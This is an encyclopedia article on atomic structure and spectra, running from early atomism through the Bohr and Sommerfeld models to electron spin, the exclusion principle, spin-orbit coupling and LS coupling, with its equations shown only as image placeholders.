But this is precisely the relation used in the construction of the limit above and hence there is a unique map\n\n$\\ast \\longrightarrow \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\}$\n\nsuch that for all $i \\in I$ we have\n\n$\\array{ \\ast \\\\ \\downarrow & \\searrow^{\\mathrlap{p'_i}} \\\\ \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\} &\\underset{p_i}{\\longrightarrow}& X_i }$\n\nnamely that map is the one that picks the element $(x'_i)_{i \\in I}$.\n\nThis shows that every cone with tip a singleton factors uniquely through the claimed limiting cone. But then for a cone with tip an arbitrary set $Y$, this same argument applies to all the single elements of $Y$.\n\nLast revised on May 8, 2017 at 12:51:45. See the history of this page for a list of all contributions to it." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91763777,"math_prob":0.9994242,"size":8318,"snap":"2021-31-2021-39","text_gpt3_token_len":1829,"char_repetition_ratio":0.17248015,"word_repetition_ratio":0.15293296,"special_character_ratio":0.20810291,"punctuation_ratio":0.09626346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999306,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-02T19:46:59Z\",\"WARC-Record-ID\":\"<urn:uuid:7cc538bc-4a9a-4778-83a2-27f4a1dcc2c6>\",\"Content-Length\":\"114679\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c402c571-f5a6-41ec-abb6-c8b61390c752>\",\"WARC-Concurrent-To\":\"<urn:uuid:9923b056-5582-4a70-9d6d-ade408ebb1fe>\",\"WARC-IP-Address\":\"172.67.137.123\",\"WARC-Target-URI\":\"https://ncatlab.org/nlab/show/free+diagram\",\"WARC-Payload-Digest\":\"sha1:UZVNFZRPHFRUEMAQ4FENTFBGU6JMR3YP\",\"WARC-Block-Digest\":\"sha1:JCHW4U5NE4TLT3B6MBSMBU3VQBMZP4S4\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154356.39_warc_CC-MAIN-20210802172339-20210802202339-00634.warc.gz\"}"}
https://pureportal.strath.ac.uk/en/publications/real-gas-effects-for-compressible-nozzle-flows
[ "# Real gas effects for compressible nozzle flows\n\nD. Drikakis, S. Tsangaris\n\nResearch output: Contribution to journalArticlepeer-review\n\n25 Citations (Scopus)\n\n## Abstract\n\nNumerical simulation of compressible nozzle flows of real gas with or without the addition of heat is presented. A generalized real gas method, using an upwind scheme and curvilinear coordinates, is applied to solve the unsteady compressible Euler equations in axisymmetric form. The present method is an extension of a previous 2D method, which was developed to solve the problem for a gas having the general equation of state in the form p = p(ρ, i). In the present work the method is generalized for an arbitrary P-V-T equation of state introducing an iterative procedure for the determination of the temperature from the specific internal energy and the flow variables. The solution procedure is applied for the study of real gas effects in an axisymmetric nozzle flow.\nOriginal language English 115-120 6 Journal of Fluids Engineering 115 1 https://doi.org/10.1115/1.2910092 Published - 1 Mar 1993\n\n## Keywords\n\n• equations of state\n• gas dynamics\n• heat transfer\n• iterative methods\n• mathematical methods\n• nozzles\n• temperature\n• curvilinear coordinates\n• flow variables\n• real gas effects\n• specific internal energy\n• Euler equations\n• upwind schemes\n• compressible flow\n• computer simulation\n\n## Fingerprint\n\nDive into the research topics of 'Real gas effects for compressible nozzle flows'. Together they form a unique fingerprint." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8581717,"math_prob":0.6249996,"size":1286,"snap":"2022-40-2023-06","text_gpt3_token_len":293,"char_repetition_ratio":0.11778471,"word_repetition_ratio":0.0,"special_character_ratio":0.21150856,"punctuation_ratio":0.044554457,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9656622,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-04T23:05:44Z\",\"WARC-Record-ID\":\"<urn:uuid:f4fa620a-67aa-4344-a1d1-71178f90dd98>\",\"Content-Length\":\"52734\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e82704d5-2c1e-49b4-9966-03442325d074>\",\"WARC-Concurrent-To\":\"<urn:uuid:def70444-c02d-41f6-a796-28028f97e433>\",\"WARC-IP-Address\":\"54.74.68.52\",\"WARC-Target-URI\":\"https://pureportal.strath.ac.uk/en/publications/real-gas-effects-for-compressible-nozzle-flows\",\"WARC-Payload-Digest\":\"sha1:JVIPAQDJFPCCAUVYX63PZW5HRC2B7BF5\",\"WARC-Block-Digest\":\"sha1:VQD7AA6KFZPQLOQXGO4UAYGH7HILZE7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337529.69_warc_CC-MAIN-20221004215917-20221005005917-00728.warc.gz\"}"}
https://essaysprompt.com/critically-evaluate-the-baseband-demodulation-and-detection-techniques-critically-evaluate-digital-modulation-techniques-including-multi-level-digital-modulation/
[ "# Critically evaluate the baseband demodulation and detection techniques Critically evaluate digital modulation techniques including multi-level digital modulation\n\nDifferentiate the types of pulse modulation techniques implemented in communication systems;\nCritically evaluate the baseband demodulation and detection techniques;\nCritically evaluate digital modulation techniques including multi-level digital modulation.\nGuidelines:\nEach question carries 20 marks.\nAssignment answers must be computer typed. Please do not write question statement. Just mention the question number.\nFont – Times New Roman\nFont – Style – Regular\nFont – Size – 12\nSoft copy of the assignment is to be submitted online in Moodle through turnitin.\nEach student has to do the assignment individually.\nExplain with suitable diagrams wherever required.\nHeading should be with Font Size 14, Bold, and Underline.\nYou can refer books in Library or use internet resource. But you should not cut and paste material from internet nor provide photocopied material from books. The assignment answers should be in your own words after understanding the matter from the above resources.\nRules & Regulations\nIf any coursework assessment is found to be copied from other candidates using unacceptable means, then it shall be cancelled and the total marks awarded will be zero. No chance of resubmission or appeal will be given*.\nYour source of information should be mentioned in the reference page clearly. (For example: If it’s from book, you have to mention the full details of the book with title, author name, edition and publisher’s name. If it is from the internet you have to mention the correct URL). Otherwise the assignment will be considered as plagiarized*.\nThe students may be asked to appear for a viva voce to validate the assignment solutions submitted. 
The viva voce does not carry any marks.\nTitle Page must have Assignment Name, Module name, your name, ID, Section and the name of the faculty.\nFor late submission, 5% of the awarded marks will be deducted for each working day.\nFor plagiarism, please refer to student guide and clarification uploaded on Moodle.\nRefer MIG for feedback dates on assignment.\nNo assignment will be accepted after one week from the date of submission*.\nDate of submission 27/12/2016\n* Refer to the MIG for MEC policy on academic integrity and late submission.\nA waveform that is band limited to 50 k Hz is sampled every 10µs. Show graphically that these samples uniquely characterize the waveform. (Use a sinusoidal example. Avoid sampling at points where the waveform equals zero.) (6 Marks)\nIf the samples are taken 30µs apart instead of 10µs,show graphically that the waveforms other than the original can be characterized by the samples.\n(6 Marks)\nA Sinusoidal voice signal s(t)=cos?(6000pt) is to be transmitted using either PCM or DM. The sampling rate for PCM is 8kHz and for the transmission with DM,the step size ? is decided to be of 31.25mV.The slope overload distortion is to be avoided.Assume that the number of quantization levels for a PCM system is 64. Determine the signaling rates of the both the systems and also comment on the result. (8 Marks)\nA compact disc(CD) records audio signals digitally by using PCM. Assume that the audio signal bandwidth equals 15kHz.\nIf the Nyquist sample are uniformly quantized into L=65,536 levels and then binary-coded, determine the number of binary digits required to encode a sample.\nIf the audio signal has average power of 0.1 W and peak voltage of 1 V. 
Find the resulting ratio of signal to quantization noise (SQNR) of the uniform quantizer output in part (i).\nDetermine the number of binary digits per second (bit/s) required to encode the audio signal and minimum bandwidth required to transmit the encoded signal.\nPractically signals are sample well above the Nyquist rate. Practical CDs use 44100 samples per second.If L=65536,determine the number of bits per second required to encode the signal,and the minimum bandwidth required to transmit the encoded signal. (10 Marks)\nGiven an analog waveform that has been sampled at its Nyquist rate, fs using natural sampling, prove that a waveform (proportional to the original waveform) can be recovered from the samples, using recovery technique shown in figure 2. The parameter mfs, is the frequency of local oscillator, where m is an integer.\n(10 Marks)\n(Hint: ? x?_p (t)=?_(n=-8)^8¦C_n e^(j2pnf_s t) x_s (t)=x(t).x_p (t)))\nConsider the signals shown below Figure 1.\nFigure 1\nEach of the signals shown in Figure 1 can be written using the form Asin(2p ft +f). For each signal, determine the values of A,f and f.\nConsider a composite signal which contains each of the four signals shown in Figure 1 added together. Show the combined signals amplitude versus frequency-domain plot. What is the equation for this combined signal? What is the bandwidth of this signal?\nIf the composite signal from part (ii) was passed through a special filter that removes its DC component, what would be the bandwidth of the filtered signal?\n(12 Marks)\nCoherent detectors are used to detect FSK signal with a rate of 2Mbps. Assuming AWGN channel with the noise power spectral density No/2 = 10-20W/Hz. Determine the probability error. Assume the amplitude of the received signal is 1µV. (8 Marks)\nImagine you wish to transmit the last four digits of your ID no. First you will need to convert your student ID from its decimal (base 10) representation into a 28-bit binary (base 2) representation. 
Using clearly labeled diagrams, show an encoding of your ID using:\n[14 Marks]\nNRZ-L signal,\nNRZ-AMI\nBi-Ø-L\nDelay Modulation\n(Note that ASCII Conversion sheet provided to you)\nA binary communication system transmits signals si(t) (i=1,2).The receiver test statistic z(T)=ai+n0 ,where the signal component ai is either a1=+1 or a2=-1 and the noise component n0 is uniformly distributed, yielding the conditional density functions given by\nand\nFind the probability of a bit error, PB for the case of equally likely signaling and the use of an optimum decision threshold. (6 Marks)\nShow that for a bit stream b(t) =011011100001, the MSK waveform has phase continuity with the help of suitable mathematical analysis and waveforms. (20 Marks)\nAssume that m=5 for f_H=(m+1) f_b/4\nf_L=(m-1) f_b/4\n\n### Save your time - order a paper!\n\nGet your paper written from scratch within the tight deadline. Our service is a reliable solution to all your troubles. Place an order on any task and we will take care of it. You won’t have to worry about the quality and deadlines\n\nOrder Paper Now" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8772671,"math_prob":0.942196,"size":6834,"snap":"2023-40-2023-50","text_gpt3_token_len":1517,"char_repetition_ratio":0.11522694,"word_repetition_ratio":0.025408348,"special_character_ratio":0.21832016,"punctuation_ratio":0.09318716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98137856,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T15:58:21Z\",\"WARC-Record-ID\":\"<urn:uuid:f447508e-85e6-4e46-aa96-cb2913bb7678>\",\"Content-Length\":\"100168\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:03f468d9-6541-402b-abd5-63b493074d62>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1a7b625-8d41-4e2d-9066-69894dca569f>\",\"WARC-IP-Address\":\"104.21.49.145\",\"WARC-Target-URI\":\"https://essaysprompt.com/critically-evaluate-the-baseband-demodulation-and-detection-techniques-critically-evaluate-digital-modulation-techniques-including-multi-level-digital-modulation/\",\"WARC-Payload-Digest\":\"sha1:LOXPYAULUOOHOWXTNRSYQSU55O5OF6B4\",\"WARC-Block-Digest\":\"sha1:CEEXPH6FJ6J72NKQEHJCHRCESAW22R5A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233509023.57_warc_CC-MAIN-20230925151539-20230925181539-00642.warc.gz\"}"}
http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/Tom_Davis__Cube_Permutations.html
[ "", null, "", null, "", null, "Date: Mon, 04 Aug 80 22:04:00 -0700 (PDT)", null, "", null, "", null, "From: Tom Davis <Davis@OFFICE-3 >\n~~~", null, "", null, "Subject: Cube Permutations\n\nThe following two transformations are useful in demonstrating that all of the\nclaimed elements of an equivalence class of positions can be reached. Using\nthe RLFBUP notation, the transformation RB'R'B'U'BU reverses two of the corner\ncubies and leaves all other corner cubies in place (It does, however, shuffle\naround the side cubies, and does some random twists to the corners). If the\nabove transformation is repeated four times in a row, everything is left\nexactly fixed, except that three corner cubies are each rotated one-third of a\nturn. By then performing the inverse of this operation on two of the three\ncorners which were turned and a new corner, it is not hard to see that any two\ncorners can be the only ones moved, and that they are each rotated one-third of\na turn in opposite directions.\n\nIf we look at just the corners alone, and ignore in-place rotation, since we\ncan exchange any adjacent pair, we can obviously get to all permutations of the\ncorners. A similar argument can be made to show that all the edge cubies can\nbe arranged arbitrarily (permuted arbitrarily, that is). An easy\ntransformation rotates three of them (among themselves) on a face, and since we\nare also allowed to rotate the face, it is easy to generate a transposition of\nany pair.\n\nUnfortunately, the two operations described above are not independent. If we\njust look at the blocks and label them ignoring color, a primitive (one-quarter\nturn) transformation moves four corners into four corners, and four edge cubies\ninto four edge cubies. If this is viewed as a member of a permutation group,\nit is obviously even (the set being permuted is all the movable cubes). Thus,\nat least half of the positions are impossible. 
If we ignore the corner cubies,\nand look at the colors of the edge cubies, every primitive rotation rotates the\nfour front colors, and the four colors around the outside, again, an even\npermutation. Since one of the above used coloring and no corner cubes, and the\nother did not, there must be at least a factor of 4 impossible positions. A\nmuch more complicated argument shows the necessity of a factor of three in the\nset of impossibles. (Does anyone know of a simple way to see this? I just did\nthe obvious thing of defining \"standard\" orientations of every cube in every\ncorner, and showed that all the primitive transformations caused the total\nrotation away from standard to be a multiple of 2 pi.)\n\nUsing the transformation which flips any two in place, and the two discussed\nabove, it is not hard to see that the factor is at most and at least 12.\n\nBoy, it sure is hard to prove things on a computer. On my notes with\ndiagrams and all, this is perfectly clear, but I get confused trying to read my\nonline proof. I hope that someone can make some sense out of it.\n\n```-------\n```", null, "", null, "", null, "", null, "", null, "" ]
[ null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_top_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/help_btn.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9411564,"math_prob":0.91706586,"size":2788,"snap":"2022-05-2022-21","text_gpt3_token_len":623,"char_repetition_ratio":0.1329023,"word_repetition_ratio":0.020449897,"special_character_ratio":0.2069584,"punctuation_ratio":0.09489051,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95488554,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T14:39:06Z\",\"WARC-Record-ID\":\"<urn:uuid:4f13b003-bfd4-4d99-859a-630928bbb3fc>\",\"Content-Length\":\"4707\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:726bf193-895c-4cd3-a987-84b899281cb5>\",\"WARC-Concurrent-To\":\"<urn:uuid:b50f36c7-bce1-4763-8812-64c07260f93c>\",\"WARC-IP-Address\":\"137.226.152.76\",\"WARC-Target-URI\":\"http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/Tom_Davis__Cube_Permutations.html\",\"WARC-Payload-Digest\":\"sha1:IIDLPYXEFVIIXZETCCS7JYKTORLGICB2\",\"WARC-Block-Digest\":\"sha1:4BGSDULRVRZVV3RPHIH6TCPMVKQ3ZIG4\",\"WARC-Identified-Payload-Type\":\"message/rfc822\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517485.8_warc_CC-MAIN-20220517130706-20220517160706-00467.warc.gz\"}"}
https://jmlr.org/beta/papers/v22/20-768.html
[ "# Prediction Under Latent Factor Regression: Adaptive PCR, Interpolating Predictors and Beyond\n\nXin Bing, Florentina Bunea, Seth Strimas-Mackey, Marten Wegkamp.\n\nYear: 2021, Volume: 22, Issue: 177, Pages: 1−50\n\n#### Abstract\n\nThis work is devoted to the finite sample prediction risk analysis of a class of linear predictors of a response $Y\\in \\mathbb{R}$ from a high-dimensional random vector $X\\in \\mathbb{R}^p$ when $(X,Y)$ follows a latent factor regression model generated by a unobservable latent vector $Z$ of dimension less than $p$. Our primary contribution is in establishing finite sample risk bounds for prediction with the ubiquitous Principal Component Regression (PCR) method, under the factor regression model, with the number of principal components adaptively selected from the data---a form of theoretical guarantee that is surprisingly lacking from the PCR literature. To accomplish this, we prove a master theorem that establishes a risk bound for a large class of predictors, including the PCR predictor as a special case. This approach has the benefit of providing a unified framework for the analysis of a wide range of linear prediction methods, under the factor regression setting. In particular, we use our main theorem to recover known risk bounds for the minimum-norm interpolating predictor, which has received renewed attention in the past two years, and a prediction method tailored to a subclass of factor regression models with identifiable parameters. This model-tailored method can be interpreted as prediction via clusters with latent centers. To address the problem of selecting among a set of candidate predictors, we analyze a simple model selection procedure based on data-splitting, providing an oracle inequality under the factor model to prove that the performance of the selected predictor is close to the optimal candidate. We conclude with a detailed simulation study to support and complement our theoretical results." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8872954,"math_prob":0.894874,"size":1955,"snap":"2021-43-2021-49","text_gpt3_token_len":389,"char_repetition_ratio":0.12608919,"word_repetition_ratio":0.0,"special_character_ratio":0.18772379,"punctuation_ratio":0.09495549,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9903628,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T00:29:33Z\",\"WARC-Record-ID\":\"<urn:uuid:6c6c4133-2ccb-4ba4-ab94-c9ff1b7c8d5d>\",\"Content-Length\":\"8240\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ce140b4e-b9a8-482f-ac85-450216ae2d94>\",\"WARC-Concurrent-To\":\"<urn:uuid:080042f6-4604-4e78-9177-7a88d2e58590>\",\"WARC-IP-Address\":\"128.52.131.20\",\"WARC-Target-URI\":\"https://jmlr.org/beta/papers/v22/20-768.html\",\"WARC-Payload-Digest\":\"sha1:NFXQI5EXY4NHLOOSG4ZDA5G6SRIXOZ6S\",\"WARC-Block-Digest\":\"sha1:N6B6YP2BGYN4SL6E5QTLW47KT2Y3SUBJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585290.83_warc_CC-MAIN-20211019233130-20211020023130-00205.warc.gz\"}"}
https://encyclopedia2.thefreedictionary.com/Atomic+structure+and+spectra
[ "# Atomic structure and spectra\n\n## Atomic structure and spectra\n\nThe idea that matter is subdivided into discrete building blocks called atoms, which are not divisible any further, dates back to the Greek philosopher Democritus. His teachings of the fifth century b.c. are commonly accepted as the earliest authenticated ones concerning what has come to be called atomism by students of Greek philosophy. The weaving of the philosophical thread of atomism into the analytical fabric of physics began in the late eighteenth and the nineteenth centuries. Robert Boyle is generally credited with introducing the concept of chemical elements, the irreducible units of which are now recognized as individual atoms of a given element. In the early nineteenth century John Dalton developed his atomic theory, which postulated that matter consists of indivisible atoms as the irreducible units of Boyle's elements, that each atom of a given element has identical attributes, that differences among elements are due to fundamental differences among their constituent atoms, that chemical reactions proceed by simple rearrangement of indestructible atoms, and that chemical compounds consist of molecules which are reasonably stable aggregates of such indestructible atoms.\n\n#### Electromagnetic nature of atoms\n\nThe work of J. J. Thomson in 1897 clearly demonstrated that atoms are electromagnetically constituted and that from them can be extracted fundamental material units bearing electric charge that are now called electrons. The electrons of an atom account for a negligible fraction of its mass. By virtue of overall electrical neutrality of every atom, the mass must therefore reside in a compensating, positively charged atomic component of equal charge magnitude but vastly greater mass. 
See Electron\n\nThomson's work was followed by the demonstration by Ernest Rutherford in 1911 that nearly all the mass and all of the positive electric charge of an atom are concentrated in a small nuclear core approximately 10,000 times smaller in extent than an atomic diameter. Niels Bohr in 1913 and others carried out some remarkably successful attempts to build solar system models of atoms containing planetary pointlike electrons orbiting around a positive core through mutual electrical attraction (though only certain “quantized” orbits were “permitted\"). These models were ultimately superseded by nonparticulate, matter-wave quantum theories of both electrons and atomic nuclei. See Quantum mechanics\n\nThe modern picture of condensed matter (such as solid crystals) consists of an aggregate of atoms or molecules which respond to each other's proximity through attractive electrical interactions at separation distances of the order of 1 atomic diameter (approximately 10⁻¹⁰ m) and repulsive electrical interactions at much smaller distances. These interactions are mediated by the electrons, which are in some sense shared and exchanged by all atoms of a particular sample, and serve as an interatomic glue that binds the mutually repulsive, heavy, positively charged atomic cores together. See Solid-state physics\n\n#### Bohr atom\n\nThe hydrogen atom is the simplest atom, and its spectrum (or pattern of light frequencies emitted) is also the simplest.
The regularity of its spectrum had defied explanation until Bohr solved it with three postulates, these representing a model which is useful, but quite insufficient, for understanding the atom.\n\nPostulate 1: The force that holds the electron to the nucleus is the Coulomb force between electrically charged bodies.\n\nPostulate 2: Only certain stable, nonradiating orbits for the electron's motion are possible, those for which the angular momentum associated with the motion of an electron in its orbit is an integral multiple of h/2π (Bohr's quantum condition on the orbital angular momentum). Each stable orbit represents a discrete energy state.\n\nPostulate 3: Emission or absorption of light occurs when the electron makes a transition from one stable orbit to another, and the frequency ν of the light is such that the difference in the orbital energies equals hν (A. Einstein's frequency condition for the photon, the quantum of light).\n\nHere the concept of angular momentum, a continuous measure of rotational motion in classical physics, has been asserted to have a discrete quantum behavior, so that its quantized size is related to Planck's constant h, a universal constant of nature. For circular motion about a central body, the orbital angular momentum is the product of the electron's mass m, its velocity v, and the orbital radius r.\n\nModern quantum mechanics has provided justification of Bohr's quantum condition on the orbital angular momentum. It has also shown that the concept of definite orbits cannot be retained except in the limiting case of very large orbits. In this limit, the frequency, intensity, and polarization can be accurately calculated by applying the classical laws of electrodynamics to the radiation from the orbiting electron. This fact illustrates Bohr's correspondence principle, according to which the quantum results must agree with the classical ones for large dimensions.
The deviation from classical theory that occurs when the orbits are smaller than the limiting case is such that one may no longer picture an accurately defined orbit. Bohr's other hypotheses are still valid.\n\nAccording to Bohr's theory, the energies of the hydrogen atom are quantized (that is, can take on only certain discrete values). These energies can be calculated from the electron orbits permitted by the quantized orbital angular momentum. The orbit may be circular or elliptical, so only the circular orbit is considered here for simplicity. Let the electron, of mass m and electric charge -e, describe a circular orbit of radius r around a nucleus of charge +e and of infinite mass. With the electron velocity v, the angular momentum is mvr, and the second postulate becomes Eq. (1).\n\n(1)", null, "The integer n is called the principal quantum number. The possible energies of the nonradiating states of the atom are given by Eq. (2).\n(2)", null, "Here ε0 is the permittivity of free space, a constant included in order to give the correct units to the statement of Coulomb's law in SI units.\n\nThe same equation for the hydrogen atom's energy levels, except for some small but significant corrections, is obtained from the solution of the Schrödinger equation, as modified by W. Pauli, for the hydrogen atom. See Quantum numbers\n\nThe frequencies of electromagnetic radiation or light emitted or absorbed in transitions are given by Eq. (3),\n\n(3)", null, "where E2 and E1 are the energies of the initial and final states of the atom. Spectroscopists usually express their measurements in wavelength λ or in wave number σ in order to obtain numbers of a convenient size. The wave number of a transition is shown in Eq. (4). (4)", null, "If T = E/(hc), then Eq. (5) results. Here T is called the spectral term. (5)", null, "The allowed terms for hydrogen, from Eq. (2), are given by Eq. (6).\n\n(6)", null, "The quantity R is the important Rydberg constant.
Its value, which has been measured to a remarkable and rapidly improving accuracy, is related to the values of other well-known atomic constants, as in Eq. (6). See Rydberg constant\n\nThe effect of finite nuclear mass must be considered, since the nucleus does not actually remain at rest at the center of the atom. Instead, the electron and nucleus revolve about their common center of mass. This effect can be accurately accounted for and requires a small change in the value of the effective mass m in Eq. (6).\n\nIn addition to the circular orbits already described, elliptical ones are also consistent with the requirement that the angular momentum be quantized. A. Sommerfeld showed that for each value of n there is a family of n permitted elliptical orbits, all having the same major axis but with different eccentricities. Illustration a shows, for example, the Bohr-Sommerfeld orbits for n = 3. The orbits are labeled s, p, and d, indicating values of the azimuthal quantum number l = 0, 1, and 2. This number determines the shape of the orbit, since the ratio of the major to the minor axis is found to be n/(l + 1). To a first approximation, the energies of all orbits of the same n are equal. In the case of the highly eccentric orbits, however, there is a slight lowering of the energy due to precession of the orbit (illus. b). According to Einstein's theory of relativity, the mass increases somewhat in the inner part of the orbit, because of greater velocity. The velocity increase is greater as the eccentricity is greater, so the orbits of higher eccentricity have their energies lowered more. The quantity l is called the orbital angular momentum quantum number or the azimuthal quantum number.
See Relativity\n\n#### Multielectron atoms\n\nIn attempting to extend Bohr's model to atoms with more than one electron, it is logical to compare the experimentally observed terms of the alkali atoms, which contain only a single electron outside closed shells, with those of hydrogen. A definite similarity is found but with the striking difference that all terms with l > 0 are double. This fact was interpreted by S. A. Goudsmit and G. E. Uhlenbeck as due to the presence of an additional angular momentum of (1/2)(h/2π) attributed to the electron spinning about its axis. The spin quantum number of the electron is s = 1/2.\n\nThe relativistic quantum mechanics developed by P. A. M. Dirac provided the theoretical basis for this experimental observation. See Electron spin\n\nImplicit in much of the following discussion is W. Pauli's exclusion principle, first enunciated in 1925, which when applied to atoms may be stated as follows: no more than one electron in a multielectron atom can possess precisely the same quantum numbers. In an independent, hydrogenic electron approximation to multielectron atoms, there are 2n² possible independent choices of the principal (n), orbital (l), and magnetic (ml, ms) quantum numbers available for electrons belonging to a given n, and no more. Here ml and ms refer to the quantized projections of l and s along some chosen direction. The organization of atomic electrons into shells of increasing radius (the Bohr radius scales as n²) follows from this principle. See Exclusion principle\n\nThe energy of interaction of the electron's spin with its orbital angular momentum is known as spin-orbit coupling. A charge in motion through either “pure” electric or “pure” magnetic fields, that is, through fields perceived as “pure” in a static laboratory, actually experiences a combination of electric and magnetic fields, if viewed in the frame of reference of a moving observer with respect to whom the charge is momentarily at rest.
For example, moving charges are well known to be deflected by magnetic fields. But in the rest frame of such a charge, there is no motion, and any acceleration of a charge must be due to the presence of a pure electric field from the point of view of an observer analyzing the motion in that reference frame. See Relativistic electrodynamics\n\nA spinning electron can crudely be pictured as a spinning ball of charge, imitating a circulating electric current. This circulating current gives rise to a magnetic field distribution very similar to that of a small bar magnet, with north and south magnetic poles symmetrically distributed along the spin axis above and below the spin equator. This representative bar magnet can interact with external magnetic fields, one source of which is the magnetic field experienced by an electron in its rest frame, owing to its orbital motion through the electric field established by the central nucleus of an atom. In multielectron atoms, there can be additional, though generally weaker, interactions arising from the magnetic interactions of each electron with its neighbors, as all are moving with respect to each other and all have spin. The strength of the bar magnet equivalent to each electron spin, and its direction in space are characterized by a quantity called the magnetic moment, which also is quantized essentially because the spin itself is quantized. 
Studies of the effect of an external magnetic field on the states of atoms show that the magnetic moment associated with the electron spin is equal in magnitude to a unit called the Bohr magneton.\n\nThe energy of the interaction between the electron's magnetic moment and the magnetic field generated by its orbital motion is usually a small correction to the spectral term, and depends on the angle between the magnetic moment and the magnetic field or, equivalently, between the spin angular momentum vector and the orbital angular momentum vector (a vector perpendicular to the orbital plane whose magnitude is the size of the orbital angular momentum). Since quantum theory requires that the quantum number j of the electron's total angular momentum shall take values differing by integers, while l is always an integer, there are only two possible orientations for s relative to l: s must be either parallel or antiparallel to l.\n\nFor the case of a single electron outside the nucleus, the Dirac theory gives Eq. (7)\n\n(7)", null, "for the spin-orbit correction to the spectral terms. Here α = e²/(2ε0hc) ≅ 1/137 is called the fine structure constant.\n\nIn atoms having more than one electron, this fine structure becomes what is called the multiplet structure. The doublets in the alkali spectra, for example, are due to spin-orbit coupling; Eq. (7), with suitable modifications, can still be applied.\n\nWhen more than one electron is present in the atom, there are various ways in which the spins and orbital angular momenta can interact. Each spin may couple to its own orbit, as in the one-electron case; other possibilities are orbit-other orbit, spin-spin, and so on. The most common interaction in the light atoms, called LS coupling or Russell-Saunders coupling, is described schematically in Eq. (8).\n\n(8)", null, "This notation indicates that the lᵢ are coupled strongly together to form a resultant L, representing the total orbital angular momentum.
